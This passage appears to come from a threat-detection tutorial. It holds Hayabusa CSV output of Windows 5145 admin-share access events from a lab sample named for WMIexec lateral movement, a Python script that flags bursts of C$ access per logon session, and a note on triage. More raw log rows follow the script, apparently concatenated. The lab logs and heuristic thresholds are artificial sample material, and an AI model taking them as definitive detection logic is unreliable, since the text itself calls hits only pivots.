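2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,r.yml,s.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,r.yml,s.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b | IP Addr: 10.23.23.9 | LID: 0x18acdd,r.yml,s.evtx
2021-04-22 20:32:45.100 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_backup | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Backup\manifest.xml | IP Addr: 10.23.23.50 | LID: 0x7c3d1,r.yml,s.evtx
2021-04-22 20:33:02.400 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: jdoe | Share Name: \\*\Public | Share Path: \??\C:\Public | Path: readme.txt | IP Addr: 10.23.23.77 | LID: 0x9a0f2,r.yml,s.evtx
"""

# IPC$ carries named-pipe traffic rather than file access; excluding it is a heuristic.
ADMIN_SHARE_EXCLUDE = {"IPC$"}


def parse_details(details: str) -> dict:
    """Split Hayabusa's 'Key: Value | Key: Value' Details column into a dict."""
    fields = {}
    for part in details.split(" | "):
        key, sep, value = part.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def is_admin_share(share_name: str) -> bool:
    """True for hidden/administrative shares such as \\*\C$ or \\*\ADMIN$."""
    name = share_name.rsplit("\\", 1)[-1]
    return name.endswith("$") and name.upper() not in ADMIN_SHARE_EXCLUDE


def parse_timestamp(ts: str) -> datetime:
    # Hayabusa prints e.g. '2021-04-22 20:32:31.717 +09:00'; %z accepts the colon form.
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f %z")


def load_rows(csv_text: str) -> list:
    return list(csv.DictReader(io.StringIO(csv_text)))


def find_admin_share_bursts(rows, min_paths=5, window=timedelta(seconds=10)):
    """Group 5145 admin-share accesses by (Computer, User, IP, LID) and flag any
    logon session that touches at least min_paths distinct paths inside `window`."""
    sessions = defaultdict(list)
    for row in rows:
        if row["EventID"] != "5145":
            continue
        d = parse_details(row["Details"])
        share = d.get("Share Name", "")
        if not is_admin_share(share):
            continue
        key = (row["Computer"], d.get("User", ""), d.get("IP Addr", ""), d.get("LID", ""))
        sessions[key].append((parse_timestamp(row["Timestamp"]), share, d.get("Path", "")))

    findings = []
    for (computer, user, ip, lid), events in sessions.items():
        events.sort(key=lambda e: e[0])
        # Sliding window anchored at each event; events are sorted so later ones are >= start.
        for i, (start, _, _) in enumerate(events):
            in_window = [e for e in events[i:] if e[0] - start <= window]
            paths = {p for _, _, p in in_window}
            if len(paths) >= min_paths:
                findings.append({
                    "computer": computer, "user": user, "ip": ip, "lid": lid,
                    "shares": sorted({s for _, s, _ in in_window}),
                    "first_seen": start.isoformat(),
                    "last_seen": in_window[-1][0].isoformat(),
                    "distinct_paths": len(paths),
                })
                break  # one finding per logon session is enough
    return findings


if __name__ == "__main__":
    for finding in find_admin_share_bursts(load_rows(SAMPLE_CSV)):
        print(finding)
```

Event 5145 is only written when the Detailed File Share audit subcategory is enabled, and deployment, backup and vulnerability-scanning tools walk admin shares the same way, so treat a hit as a pivot rather than a verdict: follow the LID to the matching 4624 (expect logon type 3 from the same source address) and to the 4688 process creations that the sample file name says sit alongside these records.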
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 
20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
